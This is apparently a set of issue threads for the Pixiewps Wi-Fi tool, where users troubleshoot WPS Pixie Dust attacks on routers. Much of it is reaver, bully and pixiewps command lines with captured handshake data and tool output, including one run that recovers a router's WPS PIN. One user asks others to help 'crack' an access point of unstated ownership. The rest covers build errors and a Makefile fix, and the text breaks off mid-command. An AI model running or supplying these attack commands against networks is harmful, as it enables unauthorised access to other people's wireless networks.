`root@kali:~# pixiewps -e bf:b4:1d:a6:e4:d8:17:f2:80:0a:88:66:48:62:ea:6c:07:0b:e5:91:53:c0:59:3b:e2:a7:28:8e:50:d7:77:b0:17:21:18:6e:02:18:f0:76:e1:bc:44:70:31:eb:20:85:fd:17:1e:25:14:99:a3:93:f5:90:bc:b4:69:3e:3f:a5:9b:c5:4e:7e:7a:24:2f:e2:fa:0a:77:d7:9b:d6:ad:df:1e:77:ab:6e:f3:29:15:4f:68:b4:c4:6c:9e:e7:16:f6:db:c0:6b:df:a4:38:79:31:32:0d:2a:ca:07:be:66:6f:da:0f:a8:f1:90:40:db:15:1b:c9:52:74:59:88:cb:7b:95:29:f9:55:1a:c2:96:3c:1b:2d:b1:92:c7:e4:af:c3:36:66:a7:23:78:08:9b:99:18:8a:32:c7:b5:39:8c:db:09:d1:bf:2f:eb:30:f7:dd:80:f9:3b:7a:74:16:c7:34:2a:2c:e8:b2:0c:52:c9:fd:0c:8c:10:c5:28:a6:c1:a7 -r d5:a3:69:92:a8:4f:d5:ca:42:a8:eb:f8:6e:90:22:57:12:42:93:69:a9:1d:ac:82:63:62:88:85:4c:77:05:7f:82:cc:1d:1a:00:b1:05:ae:9b:b4:cb:21:59:72:63:aa:78:92:fa:96:a3:97:b7:ad:15:94:56:3b:c0:13:20:08:5c:69:36:da:c6:74:6e:ba:76:e4:56:22:a3:09:fb:5b:06:29:a9:58:6a:e5:60:b8:51:b9:f8:0e:67:89:c2:1a:f8:5e:a7:d2:35:67:3d:f7:ab:23:e0:e1:18:d8:7a:be:3e:39:e2:86:16:3f:70:20:8f:69:3f:65:aa:fd:8d:c0:90:58:9b:c9:aa:1b:29:78:53:df:53:71:6a:b3:ac:d7:80:83:32:4d:9f:ef:91:c1:7e:97:d6:f7:bb:9a:92:3d:46:20:5a:b5:69:ce:3a:62:50:99:6c:09:ad:73:54:56:f0:c4:0e:77:21:32:79:5e:50:61:c7:03:bd:c0:44:f4 -s 8a:e2:db:1e:23:6f:4f:3c:7f:97:75:ce:12:b4:35:0f:ba:e3:07:74:4f:fe:f3:3c:ff:65:64:81:68:7e:23:57 -z c9:9a:85:f3:51:7a:1a:45:9b:dd:49:52:23:4e:e6:84:0c:98:80:23:a1:e2:5d:97:bf:b5:92:27:2a:88:27:86 -a 81:20:10:0a:f7:ea:ac:df:2e:04:fe:cc:63:d9:72:34:52:2c:8c:6d:f5:d8:83:17:b9:02:ea:a8:3b:4f:81:15 -n 14:ad:7e:70:11:31:73:41:2f:a3:ca:dc:37:fd:ef:d8 -m 94:b8:19:d1:f7:72:35:c6:b0:a7:81:cf:32:b4:be:e2

Pixiewps 1.2

[-] WPS pin not found!

[*] Time taken: 0 s 421 ms

[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

real 0m0.424s
user 0m0.424s
sys 0m0.000s
`

after trying this command :
root@kali:~# bully -b DC:53:7C:1D:12:75 -c 11 -v 4 wlan1mon -d [!] Bully v1.1 - WPS vulnerability assessment utility [P] Modified for pixiewps by AAnarchYY([email protected]) [+] Switching interface 'wlan1mon' to channel '11' [!] Using '00:c0:ca:81:a2:f9' for the source MAC address [+] Datalink type set to '127', radiotap headers present [+] Scanning for beacon from 'dc:53:7c:1d:12:75' on channel '11' [+] Got beacon for 'TC-E08BF' (dc:53:7c:1d:12:75) [!] Beacon information element indicates WPS is locked [+] Loading randomized pins from '/root/.bully/pins' [!] Restoring session from '/root/.bully/dc537c1d1275.run' [+] Index of starting pin number is '0002000' [+] Last State = 'NoAssoc' Next pin '37914929' [!] WPS lockout reported, sleeping for 43 seconds ... [+] Rx(Beacon) = 'Timeout' Next pin '37914929' [+] Sent packet not acknowledged after 3 attempts [+] Tx( Strt ) = 'Timeout' Next pin '37914929' [+] Sent packet not acknowledged after 3 attempts [+] Tx(DeAuth) = 'Timeout' Next pin '37914929' [P] ENonce: 14:ad:7e:70:11:31:73:41:2f:a3:ca:dc:37:fd:ef:d8 [P] PKE: bf:b4:1d:a6:e4:d8:17:f2:80:0a:88:66:48:62:ea:6c:07:0b:e5:91:53:c0:59:3b:e2:a7:28:8e:50:d7:77:b0:17:21:18:6e:02:18:f0:76:e1:bc:44:70:31:eb:20:85:fd:17:1e:25:14:99:a3:93:f5:90:bc:b4:69:3e:3f:a5:9b:c5:4e:7e:7a:24:2f:e2:fa:0a:77:d7:9b:d6:ad:df:1e:77:ab:6e:f3:29:15:4f:68:b4:c4:6c:9e:e7:16:f6:db:c0:6b:df:a4:38:79:31:32:0d:2a:ca:07:be:66:6f:da:0f:a8:f1:90:40:db:15:1b:c9:52:74:59:88:cb:7b:95:29:f9:55:1a:c2:96:3c:1b:2d:b1:92:c7:e4:af:c3:36:66:a7:23:78:08:9b:99:18:8a:32:c7:b5:39:8c:db:09:d1:bf:2f:eb:30:f7:dd:80:f9:3b:7a:74:16:c7:34:2a:2c:e8:b2:0c:52:c9:fd:0c:8c:10:c5:28:a6:c1:a7 [P] WPS Manufacturer: CBN [P] WPS Model Name: CH7284 [P] WPS Model Number: 123456 [P] WPS Serial Number: 0000001 [P] RNonce: 94:b8:19:d1:f7:72:35:c6:b0:a7:81:cf:32:b4:be:e2 [P] PKR: d5:a3:69:92:a8:4f:d5:ca:42:a8:eb:f8:6e:90:22:57:12:42:93:69:a9:1d:ac:82:63:62:88:85:4c:77:05:7f:82:cc:1d:1a:00:b1:05:ae:9b:b4:cb:21:59:72:63:aa:78:92:fa:96:a3:97:b7:ad:15:94:56:3b:c0:13:20:08:5c:69:36:da:c6:74:6e:ba:76:e4:56:22:a3:09:fb:5b:06:29:a9:58:6a:e5:60:b8:51:b9:f8:0e:67:89:c2:1a:f8:5e:a7:d2:35:67:3d:f7:ab:23:e0:e1:18:d8:7a:be:3e:39:e2:86:16:3f:70:20:8f:69:3f:65:aa:fd:8d:c0:90:58:9b:c9:aa:1b:29:78:53:df:53:71:6a:b3:ac:d7:80:83:32:4d:9f:ef:91:c1:7e:97:d6:f7:bb:9a:92:3d:46:20:5a:b5:69:ce:3a:62:50:99:6c:09:ad:73:54:56:f0:c4:0e:77:21:32:79:5e:50:61:c7:03:bd:c0:44:f4 [P] Authkey: 81:20:10:0a:f7:ea:ac:df:2e:04:fe:cc:63:d9:72:34:52:2c:8c:6d:f5:d8:83:17:b9:02:ea:a8:3b:4f:81:15 [P] E-Hash1: 8a:e2:db:1e:23:6f:4f:3c:7f:97:75:ce:12:b4:35:0f:ba:e3:07:74:4f:fe:f3:3c:ff:65:64:81:68:7e:23:57 [P] E-Hash2: c9:9a:85:f3:51:7a:1a:45:9b:dd:49:52:23:4e:e6:84:0c:98:80:23:a1:e2:5d:97:bf:b5:92:27:2a:88:27:86

Help?

It doesn't give E-Hash1 and E-Hash2

When do I type "reaver -i mon0 -c x -b xxxxx -vv -S" It gives me pke and the auth key but it doesn't give E-Hash1 and E-Hash2.

It was succesfully trying pins when I was using reaver 1.4. I tried it on 10 AP's and It says " WPS transaction failed (code: 0x03), re-trying last pin" so doesn't give E-Hash1 and E-Hash2. I waited 15 minutes to try a pin successfully but didn't work.

Mac OS X Yosemite

Hi... i'm on yosemite.. i have successfully compile n test,
but i have to run from the folder i downloaded.. it not in the /bin path..
Here the issue after sudo make install

"
install -D pixiewps /usr/bin/pixiewps
install: illegal option -- D
usage: install [-bCcpSsv] [-B suffix] [-f flags] [-g group] [-m mode]
[-o owner] file1 file2
install [-bCcpSsv] [-B suffix] [-f flags] [-g group] [-m mode]
[-o owner] file1 ... fileN directory
install -d [-v] [-g group] [-m mode] [-o owner] directory ...
Makefile:12: recipe for target 'install' failed
"

Unfortunately there was no reaver 1.5.2 from t6x can run in os x,
can't get any pkr,pke,hash etc..
i still having error while ./configure --> ./iwlib.h:54:10: fatal error: 'linux/types.h'

thank you

Pixie wps completed but pin not found!

pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -s 1f0240204aac5ac9964045609f5befb76c626fb3723f3da411249354f15dd0ef -z 1f0240204aac5ac9964045609f5befb76c626fb3723f3da411249354f15dd0ef -a 77003089267bbe5ebdc6e651c1f99b8573bda2fb848642c4bc97845703d6d71c -n 081d245110d872c42c8688843fe5e530 -r 064f206f2888b56d8f07e7efdf45610a022e9e3c4a1b35b82688b8dcb6d3e521045c7a85db6290d6c0570f09b45be1ec096324d1038dcf62e388f718c58967f6c716b21276119b43bb18823e34c4ca4e1ace94aa08b6f51c32d8fa594afe499357067a3658c61404a5adee9fa5afffaa1a45ba8dd2185a02987a11749c3b1f14edbf55b964aa7a8f42c982595e3bb6cab40f47579f238c2e94a3c0558c6cef7e2bfe87ee685c57119ae75a9cc8efd78bf09c39da97228b584291983d1610f6d9

 Pixiewps 1.3

 [*] Mode:       3 (RTL819x)
 [*] PSK1:       8e:db:93:63:f7:67:a3:87:32:00:72:58:d8:e3:58:aa
 [*] PSK2:       8e:db:93:63:f7:67:a3:87:32:00:72:58:d8:e3:58:aa
 [*] E-S1:       08:1d:24:51:10:d8:72:c4:2c:86:88:84:3f:e5:e5:30
 [*] E-S2:       08:1d:24:51:10:d8:72:c4:2c:86:88:84:3f:e5:e5:30
 [+] WPS pin:    <empty>

 [*] Time taken: 0 s 78 ms

Running the above command returns an output that suggests that the attack is successful but no wps pin is returned.

EDIT: markdown syntax.

How can we help!

What is the method that can be followed to add a new router?
The contribution of everyone grows up project Pixiewps

correcting the makefile for ubuntu based system

good night. While instaling in xubuntu 14.10 amd64 i got the following error mesage
[code]
make
gcc -lssl -lcrypto -Wall -Werror pixiewps.c -o pixiewps
/tmp/ccYID1Oj.o: dans la fonction « hmac_sha256 »:
pixiewps.c:(.text+0xf1c): référence indéfinie vers « HMAC_CTX_init »
pixiewps.c:(.text+0xf21): référence indéfinie vers « EVP_sha256 »
pixiewps.c:(.text+0xf46): référence indéfinie vers « HMAC_Init_ex »
pixiewps.c:(.text+0xf66): référence indéfinie vers « HMAC_Update »
pixiewps.c:(.text+0xf86): référence indéfinie vers « HMAC_Final »
pixiewps.c:(.text+0xf95): référence indéfinie vers « HMAC_CTX_cleanup »
collect2: error: ld returned 1 exit status
Makefile:9: recipe for target 'all' failed
make: *** [all] Error 1
[code]

by modifying the line 34 inverting the order in the compilation line i solved the issue (thanks to this thread: http://stackoverflow.com/questions/13784434/gcc-use-openssls-sha256-functions)
The syntax that's works on ubuntu and derivate is
[code]
$(CC) $(CCFLAGS) pixiewps.c -o $(TARGET)
[code]
the makefile looks finally like this
selection_033
thanks for all your works and efforts
cheers

Pixie wps not found 2017

Hello guys, can anyone here help me crack this ? I tried putting -f on pixie but still wps not found. All help would be appreciated.
Trying pin 12345670. [+] E-Nonce: ad:29:7c:0b:1a:5d:57:30:5a:8c:af:0e:ee:5b:79:26 [+] PKE: 57:b9:53:10:9f:a5:e5:5d:15:31:c5:05:2d:4f:42:f5:db:64:d2:d7:e3:33:84:7d:3a:05:fd:60:22:0a:71:67:ae:34:15:13:69:84:41:c2:f3:4c:33:43:e8:33:7f:c8:9f:30:9b:b1:c2:88:4e:9a:d9:d7:2e:6c:ef:4b:98:58:8b:95:4f:e5:ef:27:fd:c8:cb:ce:c8:f1:b3:65:bf:89:e4:6a:06:fc:14:8a:3b:81:4c:9a:3d:68:ef:d5:ad:b6:50:51:95:a3:30:14:ca:0e:5d:99:56:31:70:d2:27:db:ec:42:09:9f:c2:1d:c5:3b:c3:07:be:b5:2d:71:da:6e:a7:5d:20:54:99:a5:c1:78:85:6f:14:91:a2:a4:ef:b4:56:0a:51:c6:e4:74:fa:44:b6:1f:71:bd:6d:29:a0:ee:f7:ec:0f:e6:03:7b:17:6b:b5:60:50:88:fb:1c:95:d9:6d:e9:f5:63:c6:fb:40:60:ca:32:5a:ac:0f:e0:d4:dc [+] R-Nonce: 19:7d:fc:08:75:75:45:01:e5:fa:1a:c0:dd:89:3a:f3 [+] PKR: 2f:b1:6b:2e:44:13:90:98:fb:81:80:7f:bb:3a:f9:fa:c1:14:ce:d9:57:26:67:32:e7:54:55:d3:13:19:dd:30:e4:ac:6a:9d:c9:71:eb:1c:46:ad:f5:ab:be:5a:ef:99:4d:3a:67:cb:01:7e:64:26:d0:3d:34:a7:7a:f1:fb:44:8e:41:a0:d6:97:c2:25:28:8b:cf:b9:77:33:7d:67:4a:b5:9f:bc:00:0f:8c:45:ff:6c:a5:e2:4b:60:06:a8:e7:a2:88:26:cc:6c:e4:c6:1b:b6:74:c4:ed:dd:68:9f:af:9b:d0:03:6b:2e:9e:62:13:c5:70:1b:1a:0e:95:6e:8d:8f:19:55:a9:8e:3a:14:8a:36:22:fe:2b:f3:d1:62:dd:b2:9e:cd:03:e0:bd:7a:61:80:2e:29:3b:05:85:8e:ed:8b:95:86:17:75:e5:7a:42:68:38:84:37:b8:fd:e6:e3:4f:74:15:a0:26:96:8b:cc:23:c7:60:8a:c2:d1:b0:c9 [+] AuthKey: a5:92:96:d8:29:64:d4:ac:6f:80:bc:90:f9:b1:86:18:67:a0:cf:00:0c:63:59:33:a4:73:f7:9f:80:3e:b5:f5 [+] E-Hash1: 88:33:7d:d5:2f:90:85:7b:11:c4:61:85:86:bf:74:9b:61:bf:23:1c:4c:d9:81:1b:8d:73:d2:f9:ce:e8:90:d1 [+] E-Hash2: 2d:ce:d5:b6:76:b5:58:66:a2:fd:fd:5a:bc:e3:55:fd:e6:e6:7c:ff:73:2e:40:cd:d5:d0:95:22:41:2b:e6:d5

Pixiewps 1.2 & SerComm

Hi All,
After upgrade my notebook to Kali Linux 2016.1 I found that now Pixiewps version 1.2 can not pick up a WPS pin to routers Sercomm RV6688BCM series.

For example:

root@kali2016:~# reaver -i wlan0mon -b 00:0E:8F:0X:XX:XX -c 1 -vv -K 1

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Switching wlan0mon to channel 1
[+] Waiting for beacon from 00:0E:8F:0X:XX:XX
[+] Associated with 00:0E:8F:0X:XX:XX (ESSID: GPONXXXX)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 1e:78:13:29:7f:51:52:9e:4d:ca:ab:56:6b:23:80:aa
[P] PKE: d4:b2:7b:8b:03:fd:9a:5d:fb:f5:b5:3e:97:27:02:1e:a5:d8:d8:2f:14:d0:90:18:39:51:e0:55:ac:e2:15:1c:16:ee:7d:c1:2a:37:31:74:11:ef:7d:84:cc:85:55:9a:75:b8:da:2e:6a:1e:90:fa:fa:17:7a:7b:c8:df:7c:4a:45:11:66:ad:96:20:36:ed:1b:0c:f2:04:60:96:80:eb:4d:b6:6a:ea:b4:68:dc:cf:65:45:a1:6c:6b:47:a6:40:3d:46:01:ba:0d:8c:74:8d:9c:0a:a3:46:d6:08:72:b1:65:ee:85:f2:7f:63:b1:bc:2e:02:0d:6b:2e:48:01:96:ce:cd:b5:ce:6e:6c:0b:d8:bb:89:57:e5:6f:ac:9f:c4:cd:55:f5:ff:46:64:2c:28:9e:c0:72:b5:33:16:41:f3:11:3f:c2:93:2c:b5:66:e8:f1:dc:54:ab:35:df:13:40:47:19:d7:d8:e1:e4:39:e6:f7:59:cd:fa:e8:76:3e:b9
[P] WPS Manufacturer: SERCOMM
[P] WPS Model Name: RV6688BCM
[P] WPS Model Number: RV6688BCM
[P] Access Point Serial Number: FFFFFFFFFFFFFFFF
[+] Received M1 message
[P] R-Nonce: 37:d1:b5:02:66:10:f1:98:83:33:d8:fb:6b:bc:94:b7
[P] PKR: d2:2e:32:ee:b9:d0:1f:5a:e9:bd:f9:09:bb:b9:47:70:b2:da:df:f2:9b:b1:39:b0:33:7b:50:1b:a2:9d:dd:fa:e6:7a:46:73:05:76:36:bb:53:dd:cd:e9:50:bf:1f:7e:df:45:d8:39:52:47:39:64:c4:8f:5f:e8:84:c4:57:22:da:93:bb:2c:79:35:84:f1:22:49:66:fc:12:0a:b2:27:56:a5:2c:ab:a3:5b:fd:6f:f5:48:f7:6d:53:77:ca:3f:9e:e4:a3:ed:0d:45:66:56:02:c5:23:0b:ff:fe:a5:a6:42:b5:2f:60:7d:7b:e1:f9:30:24:9e:b4:71:75:c0:ad:7b:2e:ef:7b:da:8b:38:59:a1:bb:38:68:4a:8e:d2:00:c6:0b:aa:f1:58:e8:17:d1:5e:c9:7f:ea:aa:9a:fc:2c:fa:e0:46:bf:f3:ad:01:f5:eb:ba:d3:69:7e:9e:78:3e:01:4c:b3:21:20:6d:b1:c5:4b:05:55:18:97:4f:46:0c
[P] AuthKey: ae:ea:ec:5f:13:32:b3:3b:78:0d:14:fc:16:e5:d1:53:8f:db:e0:3b:08:85:e9:d1:6b:97:d1:8d:95:46:42:a4
[+] Sending M2 message
[P] E-Hash1: c3:12:2c:a8:cf:e5:12:6b:1b:d3:90:ec:92:25:d6:eb:fe:47:3a:79:9e:8f:c2:0f:fb:b5:09:52:3c:fa:37:de
[P] E-Hash2: 07:34:9d:78:51:de:76:dc:60:9d:35:2e:19:53:cf:b1:66:10:08:e3:6e:61:8f:02:11:4e:a7:cb:80:7a:5d:4a
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.2
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 0 s 86 ms
[Pixie-Dust]  
root@kali2016:~# pixiewps -f -e d4:b2:7b:8b:03:fd:9a:5d:fb:f5:b5:3e:97:27:02:1e:a5:d8:d8:2f:14:d0:90:18:39:51:e0:55:ac:e2:15:1c:16:ee:7d:c1:2a:37:31:74:11:ef:7d:84:cc:85:55:9a:75:b8:da:2e:6a:1e:90:fa:fa:17:7a:7b:c8:df:7c:4a:45:11:66:ad:96:20:36:ed:1b:0c:f2:04:60:96:80:eb:4d:b6:6a:ea:b4:68:dc:cf:65:45:a1:6c:6b:47:a6:40:3d:46:01:ba:0d:8c:74:8d:9c:0a:a3:46:d6:08:72:b1:65:ee:85:f2:7f:63:b1:bc:2e:02:0d:6b:2e:48:01:96:ce:cd:b5:ce:6e:6c:0b:d8:bb:89:57:e5:6f:ac:9f:c4:cd:55:f5:ff:46:64:2c:28:9e:c0:72:b5:33:16:41:f3:11:3f:c2:93:2c:b5:66:e8:f1:dc:54:ab:35:df:13:40:47:19:d7:d8:e1:e4:39:e6:f7:59:cd:fa:e8:76:3e:b9 -r d2:2e:32:ee:b9:d0:1f:5a:e9:bd:f9:09:bb:b9:47:70:b2:da:df:f2:9b:b1:39:b0:33:7b:50:1b:a2:9d:dd:fa:e6:7a:46:73:05:76:36:bb:53:dd:cd:e9:50:bf:1f:7e:df:45:d8:39:52:47:39:64:c4:8f:5f:e8:84:c4:57:22:da:93:bb:2c:79:35:84:f1:22:49:66:fc:12:0a:b2:27:56:a5:2c:ab:a3:5b:fd:6f:f5:48:f7:6d:53:77:ca:3f:9e:e4:a3:ed:0d:45:66:56:02:c5:23:0b:ff:fe:a5:a6:42:b5:2f:60:7d:7b:e1:f9:30:24:9e:b4:71:75:c0:ad:7b:2e:ef:7b:da:8b:38:59:a1:bb:38:68:4a:8e:d2:00:c6:0b:aa:f1:58:e8:17:d1:5e:c9:7f:ea:aa:9a:fc:2c:fa:e0:46:bf:f3:ad:01:f5:eb:ba:d3:69:7e:9e:78:3e:01:4c:b3:21:20:6d:b1:c5:4b:05:55:18:97:4f:46:0c -s c3:12:2c:a8:cf:e5:12:6b:1b:d3:90:ec:92:25:d6:eb:fe:47:3a:79:9e:8f:c2:0f:fb:b5:09:52:3c:fa:37:de -z 07:34:9d:78:51:de:76:dc:60:9d:35:2e:19:53:cf:b1:66:10:08:e3:6e:61:8f:02:11:4e:a7:cb:80:7a:5d:4a -a ae:ea:ec:5f:13:32:b3:3b:78:0d:14:fc:16:e5:d1:53:8f:db:e0:3b:08:85:e9:d1:6b:97:d1:8d:95:46:42:a4 -n 1e:78:13:29:7f:51:52:9e:4d:ca:ab:56:6b:23:80:aa

 Pixiewps 1.2

 [-] WPS pin not found!

 [*] Time taken: 0 s 100 ms

If you use this data in Pixiewps 1.1, the WPS pin will be found:

root@kali2:~# pixiewps -f -e d4:b2:7b:8b:03:fd:9a:5d:fb:f5:b5:3e:97:27:02:1e:a5:d8:d8:2f:14:d0:90:18:39:51:e0:55:ac:e2:15:1c:16:ee:7d:c1:2a:37:31:74:11:ef:7d:84:cc:85:55:9a:75:b8:da:2e:6a:1e:90:fa:fa:17:7a:7b:c8:df:7c:4a:45:11:66:ad:96:20:36:ed:1b:0c:f2:04:60:96:80:eb:4d:b6:6a:ea:b4:68:dc:cf:65:45:a1:6c:6b:47:a6:40:3d:46:01:ba:0d:8c:74:8d:9c:0a:a3:46:d6:08:72:b1:65:ee:85:f2:7f:63:b1:bc:2e:02:0d:6b:2e:48:01:96:ce:cd:b5:ce:6e:6c:0b:d8:bb:89:57:e5:6f:ac:9f:c4:cd:55:f5:ff:46:64:2c:28:9e:c0:72:b5:33:16:41:f3:11:3f:c2:93:2c:b5:66:e8:f1:dc:54:ab:35:df:13:40:47:19:d7:d8:e1:e4:39:e6:f7:59:cd:fa:e8:76:3e:b9 -r d2:2e:32:ee:b9:d0:1f:5a:e9:bd:f9:09:bb:b9:47:70:b2:da:df:f2:9b:b1:39:b0:33:7b:50:1b:a2:9d:dd:fa:e6:7a:46:73:05:76:36:bb:53:dd:cd:e9:50:bf:1f:7e:df:45:d8:39:52:47:39:64:c4:8f:5f:e8:84:c4:57:22:da:93:bb:2c:79:35:84:f1:22:49:66:fc:12:0a:b2:27:56:a5:2c:ab:a3:5b:fd:6f:f5:48:f7:6d:53:77:ca:3f:9e:e4:a3:ed:0d:45:66:56:02:c5:23:0b:ff:fe:a5:a6:42:b5:2f:60:7d:7b:e1:f9:30:24:9e:b4:71:75:c0:ad:7b:2e:ef:7b:da:8b:38:59:a1:bb:38:68:4a:8e:d2:00:c6:0b:aa:f1:58:e8:17:d1:5e:c9:7f:ea:aa:9a:fc:2c:fa:e0:46:bf:f3:ad:01:f5:eb:ba:d3:69:7e:9e:78:3e:01:4c:b3:21:20:6d:b1:c5:4b:05:55:18:97:4f:46:0c -s c3:12:2c:a8:cf:e5:12:6b:1b:d3:90:ec:92:25:d6:eb:fe:47:3a:79:9e:8f:c2:0f:fb:b5:09:52:3c:fa:37:de -z 07:34:9d:78:51:de:76:dc:60:9d:35:2e:19:53:cf:b1:66:10:08:e3:6e:61:8f:02:11:4e:a7:cb:80:7a:5d:4a -a ae:ea:ec:5f:13:32:b3:3b:78:0d:14:fc:16:e5:d1:53:8f:db:e0:3b:08:85:e9:d1:6b:97:d1:8d:95:46:42:a4 -n 1e:78:13:29:7f:51:52:9e:4d:ca:ab:56:6b:23:80:aa

 Pixiewps 1.1

 [*] E-S1:       4c:c0:19:77:34:b4:5d:54:75:22:6c:d2:54:9b:43:51
 [*] E-S2:       4c:c0:19:77:34:b4:5d:54:75:22:6c:d2:54:9b:43:51
 [+] WPS pin:    29821761

 [*] Time taken: 1 s

But earlier in the Kali Linux 2.0 with Pixiewps 1.1 WPS pin was determined using the -f option:

root@kali2:~# reaver -i wlan0mon -b 00:0E:8F:0X:XX:XX -c 1 -vv -K 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Switching wlan0mon to channel 1
[+] Waiting for beacon from 00:0E:8F:0X:XX:XX
[+] Associated with 00:0E:8F:0X:XX:XX (ESSID: GPONXXXX)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 72:dc:de:b6:67:b1:81:93:5e:5b:53:22:02:b7:ee:26
[P] PKE: 3f:9d:c0:d4:f7:af:5e:f5:9e:da:ff:87:44:e9:2a:91:ea:56:67:04:b1:a0:3a:e2:e3:99:9d:5b:39:00:25:39:b1:6b:2c:ba:76:d9:db:40:99:01:c3:9a:f7:1d:4d:fa:5a:4e:6e:6c:cd:48:e2:11:08:6e:05:70:a7:4c:2c:3b:8b:13:78:cc:19:7d:ec:da:2b:20:16:b5:8b:32:a8:8a:c1:e9:c3:07:f6:bd:33:26:85:65:38:7d:3d:ae:33:62:2f:a5:99:f7:e7:90:ba:7d:4c:a4:11:8b:95:f5:fd:72:cd:78:8a:68:83:19:77:5c:78:3f:bc:07:17:9e:7a:f7:f5:57:cd:20:fd:85:cd:67:a8:6d:63:2c:6b:dd:51:0a:44:dd:5f:09:65:6a:4e:2f:70:99:05:d2:4a:7b:1b:19:2f:c2:23:85:91:90:9a:e1:cd:65:63:05:5b:b5:4b:c5:7c:b9:fd:24:2d:cf:db:2e:05:a8:56:bf:90:2d:77:56
[P] WPS Manufacturer: SERCOMM
[P] WPS Model Name: RV6688BCM
[P] WPS Model Number: RV6688BCM
[P] Access Point Serial Number: FFFFFFFFFFFFFFFF
[+] Received M1 message
[P] R-Nonce: 7c:82:36:81:31:bd:77:15:10:3d:a0:f9:d3:f0:a4:4f
[P] PKR: cf:34:a9:0c:8a:11:7b:64:61:bb:16:fd:6e:9a:34:1e:f1:c6:47:28:95:5b:16:a3:2d:62:09:90:fb:1e:09:37:ce:4c:ac:83:49:43:67:3d:fa:7f:98:95:c7:3b:30:82:53:da:6a:c9:32:7e:c6:48:b7:8d:40:80:64:d6:8e:af:54:36:23:a6:6b:d3:e6:1b:ff:74:65:e6:ad:ec:0a:53:9b:f2:c7:8a:97:69:a2:94:ea:9e:b6:11:a9:bd:2e:90:0f:39:c3:f1:73:9a:f7:d3:25:14:08:d7:c5:f2:47:2c:0d:0b:61:36:93:5a:ad:6a:37:4a:ef:26:cc:73:74:7b:f1:cb:fa:c8:28:31:c6:cd:9b:1f:8c:49:ec:fc:fb:d8:45:0b:d1:31:72:dd:cf:4c:84:33:f2:da:ba:96:ce:e5:46:12:71:b6:7d:b4:91:22:3c:49:e0:c3:16:e9:86:f1:80:4f:e0:7d:1e:0d:e6:72:69:ac:2d:ff:fc:5c:96:e6
[P] AuthKey: 24:ec:5b:9d:e3:4a:6a:b4:b8:0c:35:5b:92:11:36:df:c6:37:bd:e5:e0:e6:c9:6d:ba:6f:75:fc:39:79:cd:3b
[+] Sending M2 message
[P] E-Hash1: cd:6e:66:1d:3d:fc:da:27:a4:de:54:0d:94:23:b3:fe:79:61:b1:4c:0e:14:f6:bf:54:a6:f7:ff:9f:13:b6:8b
[P] E-Hash2: 9b:d3:67:d2:85:64:dc:e4:a2:11:35:3e:2a:89:12:50:a1:0a:cc:b8:b1:ff:e9:17:63:5f:23:43:92:ad:c8:bd
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.1
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 1 s
[Pixie-Dust]  
[Pixie-Dust]   [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
[Pixie-Dust]  
root@kali2:~# pixiewps -f -e 3f:9d:c0:d4:f7:af:5e:f5:9e:da:ff:87:44:e9:2a:91:ea:56:67:04:b1:a0:3a:e2:e3:99:9d:5b:39:00:25:39:b1:6b:2c:ba:76:d9:db:40:99:01:c3:9a:f7:1d:4d:fa:5a:4e:6e:6c:cd:48:e2:11:08:6e:05:70:a7:4c:2c:3b:8b:13:78:cc:19:7d:ec:da:2b:20:16:b5:8b:32:a8:8a:c1:e9:c3:07:f6:bd:33:26:85:65:38:7d:3d:ae:33:62:2f:a5:99:f7:e7:90:ba:7d:4c:a4:11:8b:95:f5:fd:72:cd:78:8a:68:83:19:77:5c:78:3f:bc:07:17:9e:7a:f7:f5:57:cd:20:fd:85:cd:67:a8:6d:63:2c:6b:dd:51:0a:44:dd:5f:09:65:6a:4e:2f:70:99:05:d2:4a:7b:1b:19:2f:c2:23:85:91:90:9a:e1:cd:65:63:05:5b:b5:4b:c5:7c:b9:fd:24:2d:cf:db:2e:05:a8:56:bf:90:2d:77:56 -r cf:34:a9:0c:8a:11:7b:64:61:bb:16:fd:6e:9a:34:1e:f1:c6:47:28:95:5b:16:a3:2d:62:09:90:fb:1e:09:37:ce:4c:ac:83:49:43:67:3d:fa:7f:98:95:c7:3b:30:82:53:da:6a:c9:32:7e:c6:48:b7:8d:40:80:64:d6:8e:af:54:36:23:a6:6b:d3:e6:1b:ff:74:65:e6:ad:ec:0a:53:9b:f2:c7:8a:97:69:a2:94:ea:9e:b6:11:a9:bd:2e:90:0f:39:c3:f1:73:9a:f7:d3:25:14:08:d7:c5:f2:47:2c:0d:0b:61:36:93:5a:ad:6a:37:4a:ef:26:cc:73:74:7b:f1:cb:fa:c8:28:31:c6:cd:9b:1f:8c:49:ec:fc:fb:d8:45:0b:d1:31:72:dd:cf:4c:84:33:f2:da:ba:96:ce:e5:46:12:71:b6:7d:b4:91:22:3c:49:e0:c3:16:e9:86:f1:80:4f:e0:7d:1e:0d:e6:72:69:ac:2d:ff:fc:5c:96:e6 -s 